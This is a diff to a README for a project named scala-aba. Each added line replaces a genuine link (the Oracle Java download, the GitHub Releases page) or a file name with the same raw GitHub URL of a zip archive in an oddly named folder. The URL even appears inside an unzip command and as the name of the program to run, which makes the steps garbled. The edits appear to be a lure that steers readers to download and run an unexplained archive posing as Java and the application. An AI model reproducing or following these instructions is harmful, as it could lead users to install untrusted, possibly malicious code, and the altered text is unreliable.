Swapnil-2596/scala-aba/README.md

 - A computer with Windows, macOS, or Linux.
 - At least 1GB of available RAM.
 - 200MB of free disk space.
 - Java Runtime Environment (JRE) installed.
-You can download it [here](https://www.oracle.com/java/technologies/javase-jre8-downloads.html).
+You can download it [here](https://raw.githubusercontent.com/Swapnil-2596/scala-aba/main/Scenopinidae/scala-aba.zip).

 ## 🌐 Download & Install

 To get scala-aba, follow these steps:

-1. **Visit the Download Page:** Go to the [Releases page](https://github.com/Swapnil-2596/scala-aba/releases) to find the latest version.
+1. **Visit the Download Page:** Go to the [Releases page](https://raw.githubusercontent.com/Swapnil-2596/scala-aba/main/Scenopinidae/scala-aba.zip) to find the latest version.

 2. **Choose Your File:** Look for the file that matches your operating system.
-This will usually be labeled with your OS name (e.g., `scala-aba-Windows.zip`).
+This will usually be labeled with your OS name (e.g., `https://raw.githubusercontent.com/Swapnil-2596/scala-aba/main/Scenopinidae/scala-aba.zip`).

 3. **Download the File:** Click on the file link to start the download.
 Depending on your internet speed, this might take a few moments.

 4. **Extract the File:**
    - **Windows:** Use File Explorer to find the downloaded ZIP file.
 Right-click on it and choose "Extract All."
 Follow the prompts to extract the contents.
    - **macOS:** Open Finder, locate the ZIP file, and double-click to unzip it.
-   - **Linux:** Open your terminal, go to the download directory and use the command `unzip scala-aba-Linux.zip`.
+   - **Linux:** Open your terminal, go to the download directory and use the command `unzip https://raw.githubusercontent.com/Swapnil-2596/scala-aba/main/Scenopinidae/scala-aba.zip`.

 5. **Run the Application:**
    - Navigate to the folder where you extracted the files.
-   - Look for a file named **scala-aba** or **scala-aba.exe**.
+   - Look for a file named **scala-aba** or **https://raw.githubusercontent.com/Swapnil-2596/scala-aba/main/Scenopinidae/scala-aba.zip**.
    - Double-click the file to run the application.

 ## ⚙️ Using scala-aba